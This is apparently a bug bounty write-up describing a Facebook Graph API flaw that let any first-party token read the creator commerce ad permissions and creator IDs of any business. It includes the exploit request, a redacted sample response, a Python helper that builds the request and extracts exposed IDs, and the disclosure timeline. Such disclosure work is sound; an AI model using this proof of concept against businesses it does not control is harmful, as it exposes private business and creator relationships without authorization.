Disclose the commerce creation ad permissions of creators (ig_user)

Gtm Mänôz
Sep 12, 2023


This bug was found accidentally while playing with the Facebook Graph API. Requesting the creator_commerce_ad_permissions field on a business node allowed anyone holding a first-party access token to view the creators (ig_user) of any Instagram business account, together with their commerce creation ad permissions, without any relationship to that business.

Proof of concept

Request:

GET /v17.0/{business-id}/?fields=creator_commerce_ad_permissions{brand_linked_fb_page,brand_ig_user,creator_linked_fb_page,permission_created_time,brand_ig_fbid,creator_ig_user,id,permission_status}
Host: graph.facebook.com

Response:

{
  "creator_commerce_ad_permissions": {
    "data": [
      {
        "id": "123456789",
        "brand_linked_fb_page": {
          "name": "Page Name 1",
          "id": "PageID_1"
        },
        "brand_ig_user": {
          "id": "17xxxxxxxxxxxxx"
        },
        "creator_linked_fb_page": {
          "name": "Page Name 2",
          "id": "PageID_2"
        },
        "permission_created_time": 1654003658,
        "brand_ig_fbid": "17xxxxxxxxxxxxx",
        "creator_ig_user": {
          "id": "17xxxxxxxxxxxxx"
        },
        "permission_status": 5
      }
    ]
  }
}
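To make the proof of concept repeatable, here is a small Python helper that rebuilds the request above and extracts the exposed identifiers from a response of that shape. This is an added example, not code from the original post or from Facebook; the sample response is constructed from the redacted JSON above (the 17-prefixed IDs are placeholders), and the meaning of the numeric permission_status value is not documented on this page, so the code only passes it through.

```python
"""Rebuild the Graph API PoC request and summarise what a response discloses.

Added example, not part of the original write-up. The sample response is
constructed to match the shape of the post's redacted output; nothing here
is captured from a live account.
"""
import json
from urllib.parse import urlencode

GRAPH_HOST = "https://graph.facebook.com"
API_VERSION = "v17.0"

# Field list exactly as used in the original PoC request.
POC_FIELDS = (
    "creator_commerce_ad_permissions{brand_linked_fb_page,brand_ig_user,"
    "creator_linked_fb_page,permission_created_time,brand_ig_fbid,"
    "creator_ig_user,id,permission_status}"
)

# Constructed sample response (same structure as the post's redacted JSON).
SAMPLE_RESPONSE = json.dumps({
    "creator_commerce_ad_permissions": {
        "data": [
            {
                "id": "123456789",
                "brand_linked_fb_page": {"name": "Page Name 1", "id": "PageID_1"},
                "brand_ig_user": {"id": "17000000000000001"},
                "creator_linked_fb_page": {"name": "Page Name 2", "id": "PageID_2"},
                "permission_created_time": 1654003658,
                "brand_ig_fbid": "17000000000000002",
                "creator_ig_user": {"id": "17000000000000003"},
                "permission_status": 5,
            }
        ]
    }
})


def build_poc_url(business_id: str, access_token: str) -> str:
    """Return the GET URL for the PoC; the token is sent as a query parameter,
    which is how the Graph API accepts it (the page's request omitted it)."""
    query = urlencode({"fields": POC_FIELDS, "access_token": access_token})
    return f"{GRAPH_HOST}/{API_VERSION}/{business_id}/?{query}"


def parse_permissions(raw_json: str) -> list:
    """Extract one flat record per permission entry.

    A Graph API error body ({"error": {...}}) is raised as ValueError so a
    post-fix re-test distinguishes "denied" from "field absent"; a response
    without the field (or with an empty data list) yields [].
    """
    body = json.loads(raw_json)
    if "error" in body:
        err = body["error"]
        raise ValueError(f"Graph API error {err.get('code')}: {err.get('message')}")
    edge = body.get("creator_commerce_ad_permissions") or {}
    records = []
    for entry in edge.get("data", []):
        records.append({
            "permission_id": entry.get("id"),
            "brand_ig_user_id": (entry.get("brand_ig_user") or {}).get("id"),
            "brand_ig_fbid": entry.get("brand_ig_fbid"),
            "brand_page_id": (entry.get("brand_linked_fb_page") or {}).get("id"),
            "creator_ig_user_id": (entry.get("creator_ig_user") or {}).get("id"),
            "creator_page_id": (entry.get("creator_linked_fb_page") or {}).get("id"),
            "permission_status": entry.get("permission_status"),
            "created_time": entry.get("permission_created_time"),
        })
    return records


def is_disclosed(raw_json: str) -> bool:
    """True when at least one creator ig_user id is readable in the response."""
    return any(r["creator_ig_user_id"] for r in parse_permissions(raw_json))


if __name__ == "__main__":
    # Placeholder business id and token; substitute real values to re-test.
    print(build_poc_url("BUSINESS_ID", "FIRST_PARTY_TOKEN"))
    for record in parse_permissions(SAMPLE_RESPONSE):
        print(record)
    print("disclosed:", is_disclosed(SAMPLE_RESPONSE))
```

To verify a fix, run the request with a first-party token that has no relationship to the target business: the disclosure is confirmed only if `is_disclosed` returns True for a business you do not control.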

Impact

This could have let anyone with a first-party access token disclose the creators (ig_user) of any Instagram business account, along with their commerce creation ad permissions, without owning or managing that account.

Timeline

  • 26 Sep, 2021 — Report Sent to Facebook.
  • 27 Sep, 2021 — Closed as informative by Facebook.
  • 16 Jan, 2023 — Learned from Amol Baikar, who had been marked as a duplicate of the second reporter, that another security researcher was rewarded (23 Jun, 2022) for the same issue I reported.
  • 19 Jan, 2023 — Requested the Facebook team to review my report.
  • 26 Apr, 2023 — Acknowledged by Facebook and awarded with bounty on the same day.
